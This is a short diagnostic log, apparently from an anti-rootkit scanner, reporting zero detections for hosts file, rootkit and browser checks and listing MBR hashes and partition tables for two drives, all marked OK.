¤¤¤ Hosts File : 0 ¤¤¤

 

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

 

¤¤¤ Web browsers : 0 ¤¤¤

 

¤¤¤ MBR Check : ¤¤¤

+++++ PhysicalDrive0:  +++++

--- User ---

[MBR] dd024e018e30dfaad67172ee7859e3c8

[BSP] 7c67bdb6eea5fc037f2fb1fde4966781 : Windows Vista/7/8 MBR Code

Partition table:

0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB

1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 953767 MB

User = LL1 ... OK

User = LL2 ... OK

 

+++++ PhysicalDrive1:  +++++

--- User ---

[MBR] 617240ae40078ba5b2d63715af595c39

[BSP] 130a6938a2838fcaeb361cefc3bc8c6d : Windows Vista/7/8 MBR Code

Partition table:

0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 953867 MB

User = LL1 ... OK

User = LL2 ... OK